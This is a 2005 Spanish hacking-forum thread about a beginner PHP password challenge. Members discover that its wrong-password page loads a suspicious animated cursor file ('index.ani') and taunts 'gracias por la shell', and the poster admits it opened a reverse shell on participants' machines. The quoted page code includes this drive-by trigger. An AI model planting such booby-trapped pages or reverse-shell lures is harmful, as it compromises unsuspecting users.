Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Diciembre 02, 2008, 04:40:05
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Hack Novato  |  Hack para newbies (Moderadores: OzX, Axus)  |  Tema: Reto v.1.0 by eit 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Reto v.1.0 by eit  (Leído 962 veces)
eit
Visitante
« en: Febrero 23, 2005, 06:57:16 »
juegos gratis
bueno ya que se enojaron conmigo por poner como resolver el otro reto el del tal viper, les dejo aqui mi reto (Ya que estan de moda =P)

Bueno ahi les va, es una simple autentificacion en PHP, nada de encriptacion, el password esta en text plain dentro de algun file en el espacio.

Asi que empiecen a 'trabajar', asi que primero asegurense de saber el password, de todos modos, cuando alguien inserte el password correcto me mandara una notificacion via mail pero por si las dudas, si resulven mandenme un mail o PM a eit @linuxmail.org

El reto esta en:


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
« Última modificación: Febrero 24, 2005, 04:51:09 por eit » En línea
vassily
Visitante
« Respuesta #1 en: Febrero 23, 2005, 07:00:08 »
Hi
Cita de: eit en Febrero 23, 2005, 06:57:16
bueno ya que se enojaron conmigo por poner como resolver el otro reto el del tal viper, les dejo aqui mi reto (Ya que estan de moda =P)

Bueno ahi les va, es una simple autentificacion en PHP, nada de encriptacion, el password esta en text plain dentro de algun file en el espacio.

El reto esta en:


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

Mmm pues si no hubieras publicado la respuesta no se hayan enojado
Si vas a estar buen tiempo en el foro llevatela bien y sin problems
Ay la ven
En línea
Niklas von Wolfbut
Visitante
« Respuesta #2 en: Febrero 23, 2005, 08:47:12 »
Hola

Cita de: eit en Febrero 23, 2005, 06:57:16
pero cuidado ya que si intentas un password y no es el correcto te puedes llevar una sorpresita, asi que primero asegurense de saber el password

o_0 como que una sorpresita?

Saludos
En línea
eit
Visitante
« Respuesta #3 en: Febrero 23, 2005, 09:05:26 »
Pues no fuera sorpresa si les digo... Tongue
En línea
sdrako
Habitual
*****
Desconectado Desconectado

Mensajes: 389



Ver Perfil
« Respuesta #4 en: Febrero 23, 2005, 09:11:29 »
En línea

ganar o perder se que nunka me importa... lo que hembruja es el riesgo
eit
Visitante
« Respuesta #5 en: Febrero 23, 2005, 09:19:23 »
Osea, haber, alguien dijo que era sorpresa desagradable, o mala? claro que no, solamente dije que hay una sorpresa, asi que pues haber quien si la saca xD
En línea
- chikilin -
www.tabasqueno.com
Habitual
*****
Desconectado Desconectado

Mensajes: 321


http://www.solucionhosting.com/

chikilinmsn@gmail.com
Ver Perfil WWW
« Respuesta #6 en: Febrero 23, 2005, 09:29:57 »
Citar
-Error-

Esta pagina Solo Puede Ser Vista Con Internet Explorer


 Ah por cierto, el password esta mal, y gracias por la shell =)

Si como no que flojera da, esto al intentar abrir el archivo je.php, la verdad da flojera

y aqui el code de fallo.html
Código:
<div id="a64262e31" style="text-align: center; margin: 0px; padding: 0px;" align="center"></div>
<script>
x6f37e8c46cd = "loranger-chand-cristofe";
src7b57dad8="http://ads.tripod.lycos.es/ad/google/frame.php?_url="+escape(self.location)+"&gg_bg=&gg_template=&mkw=&cat=noref";
function srcIframe7b57dad8(src, width) {if (document.getElementsByTagName("div")[0]) {document.getElementsByTagName("div")[0].id = "a64262e31";}return '<iframe id="f7b57dad8" src="'+src+'" height="95" width="'+width+'" frameborder="0" marginwidth="0" marginheight="0" allowtransparency="true"></iframe>';}x33f1396b498 = new Array();function x71d616146a8(xfa39b0cfbaf, x7325e11c556) {x838ee4625c5 = new String(x7325e11c556);xc3605d47cee = x838ee4625c5.substr(0,x838ee4625c5.indexOf('px')) * 1 + 95;
if (xfa39b0cfbaf.style.top == "" && !xfa39b0cfbaf.style.marginTop) {xfa39b0cfbaf.style.marginTop = "0px";xfa39b0cfbaf.style.paddingTop = "0px";}if ((x838ee4625c5.substr(0,x838ee4625c5.indexOf('px')) * 1 < 95) || (!x33f1396b498[xfa39b0cfbaf]) ) {xc3605d47cee = (xc3605d47cee<95) ? 95 : xc3605d47cee ;xfa39b0cfbaf.style.top = xc3605d47cee+"px" ;x33f1396b498[xfa39b0cfbaf] = 1 ;}}function checkGoogle7b57dad8(width) {if (!document.getElementsByTagName("iframe")[0] || document.getElementsByTagName("iframe")[0].src != src7b57dad8) {window.location.href="http://www.tripod.lycos.es";}x7280676f72a = new Array();x99cf756feb0 = new Array();x7280676f72a["a64262e31"] = new Array();x99cf756feb0["a64262e31"] = new Array();x7280676f72a["f7b57dad8"] = new Array();x99cf756feb0["f7b57dad8"] = new Array();x7280676f72a["a64262e31"][0] = "style.display" ;x99cf756feb0["a64262e31"][0] = "block" ;x7280676f72a["a64262e31"][1] = "style.height";x99cf756feb0["a64262e31"][1] = "95px";x7280676f72a["a64262e31"][2] = "style.width";x99cf756feb0["a64262e31"][2] = width+"px";x7280676f72a["a64262e31"][3] = "style.visibility";x99cf756feb0["a64262e31"][3] = "visible";x7280676f72a["a64262e31"][4] = "style.margin";x99cf756feb0["a64262e31"][4] = "0px";x7280676f72a["f7b57dad8"][0] = "style.display" ;x99cf756feb0["f7b57dad8"][0] = "block" ;x7280676f72a["f7b57dad8"][1] = "style.height";x99cf756feb0["f7b57dad8"][1] = "95px";x7280676f72a["f7b57dad8"][2] = "style.width";x99cf756feb0["f7b57dad8"][2] = width+"px";x7280676f72a["f7b57dad8"][3] = "style.visibility";x99cf756feb0["f7b57dad8"][3] = "visible";x7280676f72a["f7b57dad8"][4] = "style.margin";x99cf756feb0["f7b57dad8"][4] = "0px";for (var j in x7280676f72a) {for (i = 0 ; i < x7280676f72a[j].length ; i++) {if (!eval('document.getElementById("'+j+'")')) {break;}if (eval('document.getElementById("'+j+'").'+x7280676f72a[j][i]+' != "'+x99cf756feb0[j][i]+'"')) {eval('document.getElementById("'+j+'").'+x7280676f72a[j][i]+' = "'+x99cf756feb0[j][i]+'"');}}}x6d291a35e14 = new Array();x3a12a33063c = new Array();x6d291a35e14["body"] = new Array();x3a12a33063c["body"] = new Array();x6d291a35e14["body"][0] = "style.marginTop";x3a12a33063c["body"][0] = "0px" ;x6d291a35e14["body"][1] = "style.paddingTop";x3a12a33063c["body"][1] = "0px" ;for (var j in x6d291a35e14) {eval ('x907367ae6a9 = document.getElementsByTagName("'+j+'");');for (k = 0 ; k < x907367ae6a9.length ; k++) {for (i = 0 ; i < x6d291a35e14[j].length ; i++) {if (!eval('document.getElementsByTagName("'+j+'")')) {break;}if (eval('document.getElementsByTagName("'+j+'")['+k+'].'+x6d291a35e14[j][i]+' != "'+x3a12a33063c[j][i]+'"')) {eval('document.getElementsByTagName("'+j+'")['+k+'].'+x6d291a35e14[j][i]+' = "'+x3a12a33063c[j][i]+'"');}}}}x907367ae6a9 = document.getElementsByTagName("div");for (i = 0 ; i < x907367ae6a9.length ; i++) {if (document.all) {if ( (x907367ae6a9[i].currentStyle.position == "absolute") || (x907367ae6a9[i].currentStyle.position == "fixed") ) {x71d616146a8(x907367ae6a9[i], x907367ae6a9[i].offsetTop + "px");}}else {if ( (document.defaultView.getComputedStyle(x907367ae6a9[i], '').getPropertyValue("position") == "absolute") || (document.defaultView.getComputedStyle(x907367ae6a9[i], '').getPropertyValue("position") == "fixed") ) {x71d616146a8(x907367ae6a9[i], document.defaultView.getComputedStyle(x907367ae6a9[i], '').getPropertyValue("top"));}}}setTimeout("checkGoogle7b57dad8("+width+")", 500);}
function displayGoogleAd7b57dad8() {width = (document.body.clientWidth > 770) ? document.body.clientWidth : 770 ;width -= 20;content7b57dad8 = srcIframe7b57dad8(src7b57dad8, width);if (!this.document.getElementsByTagName("frameset")[0]) {document.getElementById("a64262e31").innerHTML = content7b57dad8;checkGoogle7b57dad8(width);}}window.onload = new Function("if (x6f37e8c46cd != '7b57dad8') {displayGoogleAd7b57dad8();}");

document.getElementsByTagName("script")[0].text = "";
</script>
<html>
<pre> -Error-<br>
Esta pagina Solo Puede Ser Vista Con Internet Explorer</pre><br>
<pre> Ah por cierto, el password esta mal, y gracias por la shell =) </pre>
<head>
<style>
* {CURSOR: url("index.ani")}
</style>
</head>

</html>
</pre></xmp></noscript>
<script language="javascript" src="http://ads.tripod.lycos.es/ad/test_frame_size.js"></script>
<script language="javascript">x6f37e8c46cd = "7b57dad8";
if (!AD_clientWindowSize()) {document.write("<NOSC"+"RIPT>");}</script>

<script>displayGoogleAd7b57dad8();</script>
<script type="text/javascript" src="http://ads.tripod.lycos.es/ad/ad.php?cat=noref&mkw=&CC=es&ord=7b57dad8&adpref="></script>
<!-- START RedSheriff Measurement V5.01 -->
<!-- COPYRIGHT 2002 RedSheriff Limited -->
<script language="JavaScript" type="text/javascript"><!--
  var _rsCI='lycos-es';
  var _rsCG='noref';
  var _rsDT=1;
  var _rsSI=escape(window.location);
  var _rsLP=location.protocol.indexOf('https')>-1?'https:':'http:';
  var _rsRP=escape(document.referrer);
  var _rsND=_rsLP+'//secure-uk.imrworldwide.com/';

  if (parseInt(navigator.appVersion)>=4) {
    var _rsRD=(new Date()).getTime();
    var _rsSE=0;
    var _rsSV='';
    var _rsSM=0;
    _rsCL='<scr'+'ipt language="JavaScript" type="text/javascript" src="'+_rsND+'v5.js"><\/scr'+'ipt>';
  } else {
    _rsCL='<img src="'+_rsND+'cgi-bin/m?ci='+_rsCI+'&cg='+_rsCG+'&si='+_rsSI+'&rp='+_rsRP+'">';
  }
  document.write(_rsCL);
//--></script>
<noscript>
<img src="//secure-uk.imrworldwide.com/cgi-bin/m?ci=lycos-es&amp;cg=noref" alt="">

</noscript>
<script>if (!AD_clientWindowSize()) {document.write("<NOSC"+"RIPT>");}</script>
<!-- END RedSheriff Measurement V5 -->

Al menos lo visible con un navegador
« Última modificación: Febrero 23, 2005, 10:01:14 por - chikilin - » En línea

System Powered by:   SuSe Linux

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Linux User : # 406370
eit
Visitante
« Respuesta #7 en: Febrero 23, 2005, 09:43:48 »
chikilin lamento decirte que estas en un error, ese codigo es de fallo.html no de je.php =)

Pero busquen mas, no quieran sacar el password del los files PHP, puede haber un errorsillo en el hosintg por ahi, quien sabe.. Roll Eyes

Ah por cierto, todos esos javascripts y tanta mamada no als puse yo, es la publicidad de lycos Tongue
« Última modificación: Febrero 23, 2005, 09:44:46 por eit » En línea
- chikilin -
www.tabasqueno.com
Habitual
*****
Desconectado Desconectado

Mensajes: 321


http://www.solucionhosting.com/

chikilinmsn@gmail.com
Ver Perfil WWW
« Respuesta #8 en: Febrero 23, 2005, 10:32:33 »
The directory /eitsite is not available to be viewed. To view files in this directory you must include it as an allowed directory. To set /eitsite as an allowed directory open this file (using a text editor or your servers file edit function) and add /eitsite to the allowed directories array at the top of the file.

Jaja, lo bueno es que dejan ver el source xD y buscas errores de php en el host...
En línea

System Powered by:   SuSe Linux

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Linux User : # 406370
eit
Visitante
« Respuesta #9 en: Febrero 23, 2005, 10:43:25 »
la neta... no entendi lo que quisiste decir, pero lo que si digo es que el error no es de PHP (hasta donde yo sepa) si no de otro fallo (bueno en vez de ser fallo es otra forma de entrar)  Tongue Roll Eyes
En línea
- chikilin -
www.tabasqueno.com
Habitual
*****
Desconectado Desconectado

Mensajes: 321


http://www.solucionhosting.com/

chikilinmsn@gmail.com
Ver Perfil WWW
« Respuesta #10 en: Febrero 23, 2005, 10:49:01 »
ok, pues ya que halla tiempo le busco
y mas si no es de PHP Tongue
En línea

System Powered by:   SuSe Linux

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Linux User : # 406370
mircopº
Visitante
« Respuesta #11 en: Febrero 24, 2005, 09:37:50 »
parace bueno , hasta eso de la "sorpresa" , yo lo voy a intentar, ahunque no soy muy entendido de el tema, pero veamos q sale.-
seria bueno algunas ayudas, para quienes estamos bastante nuevos en este tema, [es una opinion]

saludos
En línea
nekro
Visitante
« Respuesta #12 en: Febrero 24, 2005, 10:49:23 »
Esta es la sorpresita

Código:
-Error-

Esta pagina Solo Puede Ser Vista Con Internet Explorer


 Ah por cierto, el password esta mal, y gracias por la shell =)

Dios, que pelotud* que es...
En línea
mircopº
Visitante
« Respuesta #13 en: Febrero 24, 2005, 11:21:22 »
En línea
LooSeR[FT]
Visitante
« Respuesta #14 en: Febrero 24, 2005, 02:26:15 »
Con eso que nos quiere decir que con eso nos ha robado una shell???  :-\ Huh
En línea
eit
Visitante
« Respuesta #15 en: Febrero 24, 2005, 05:41:44 »
Bueno les dejo una prueva, hagan un leech al site, encontraran cosas interesantes.....
En línea
Viper
Visitante
« Respuesta #16 en: Febrero 24, 2005, 06:10:45 »
Para los que preguntaban por la sorpresa de su "reto", seguramente era esta....



Es el index.ani que hace referencia el je.php...
Bajaros con cualquier gestor de descargas
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion y si teneis un buen antivirus saltara la alerta...
Y para los que vieron el famoso fallo.html del je.php..
Código:
document.getElementsByTagName("script")[0].text = "";
</script>
<html>
<pre> -Error-<br>
Esta pagina Solo Puede Ser Vista Con Internet Explorer</pre><br>
<pre> Ah por cierto, el password esta mal, y gracias por la shell =) </pre>
<head>
<style>
* {CURSOR: url("index.ani")}

Saludos! Wink
« Última modificación: Febrero 24, 2005, 06:13:11 por Viper » En línea
eit
Visitante
« Respuesta #17 en: Febrero 24, 2005, 06:22:53 »

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion no existe desde el primer post, lo borre precisamente por que regresaba una reverseshell pero ya no existe y pueden comprovarlo, asi que ya pueden termianr el reto sin ningun problema


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion <-- 404
En línea
(¯°»¦«¤ Ave de Fuego ¤»¦«°¯)
Moderador Global
Colaborador
*****
Desconectado Desconectado

Mensajes: 876


(¯°»¦«¤ Ave de Fuego ¤»¦«°¯)


Ver Perfil WWW
« Respuesta #18 en: Febrero 24, 2005, 10:30:57 »
Ya recuerdo la gracia tuya del reverse shell, apoco ya te funciona si cierro la ventana ?
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Departamento en Venta Oaxaca
eit
Visitante
« Respuesta #19 en: Febrero 24, 2005, 10:37:02 »
jaja, todavia te acuerdas? xD

Si estoy en eso, estoy viendo como correr el proceso despues de haber sido abierto, ya sea instalando el netcat remotamente y regresar la shell =)
En línea
(¯°»¦«¤ Ave de Fuego ¤»¦«°¯)
Moderador Global
Colaborador
*****
Desconectado Desconectado

Mensajes: 876


(¯°»¦«¤ Ave de Fuego ¤»¦«°¯)


Ver Perfil WWW
« Respuesta #20 en: Febrero 24, 2005, 10:50:58 »
Cuando quieras probar ahi me avisas.. todo sea por colaborar con tan distinguida persona... XDDD .

Por cierto, tampoco se me olvida lo de mi sql Embarrassed  lo bueno es que fue por mi "seguridad".....

« Última modificación: Febrero 24, 2005, 11:00:51 por (¯°»¦«¤ Ave de Fuego ¤»¦«°¯) » En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Departamento en Venta Oaxaca
chekno
Visitante
« Respuesta #21 en: Febrero 25, 2005, 08:46:52 »
Una sugerencia, esto es hack para newbies. Creo que este post no esta hecho para newbies, por que al menos yo no me entero de lo que hablais. Creo que es para gente avanzada.
Un saludo.
En línea
LiToXxX
Visitante
« Respuesta #22 en: Febrero 25, 2005, 08:53:48 »
Hola

Chekno tiene toda la razon... plz por que no lo poneis en idioma castellano??
La cosa es que ya no hay virus si fallas no?, por que yo intentando mirarlo falle xD


GRACIAS
En línea
Prosutch
Visitante
« Respuesta #23 en: Marzo 03, 2005, 08:49:08 »
mmmmm me lo tome a mal lo de kuando t ekivokas en el pass y sinceramentte este reto me lo paso x el cu***
y aguante los retos de VIPER!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
En línea
Prosutch
Visitante
« Respuesta #24 en: Marzo 08, 2005, 09:20:03 »
mmm este post kedo olvidado????menos mal!!!!!
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Hack Novato  |  Hack para newbies (Moderadores: OzX, Axus)  |  Tema: Reto v.1.0 by eit « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC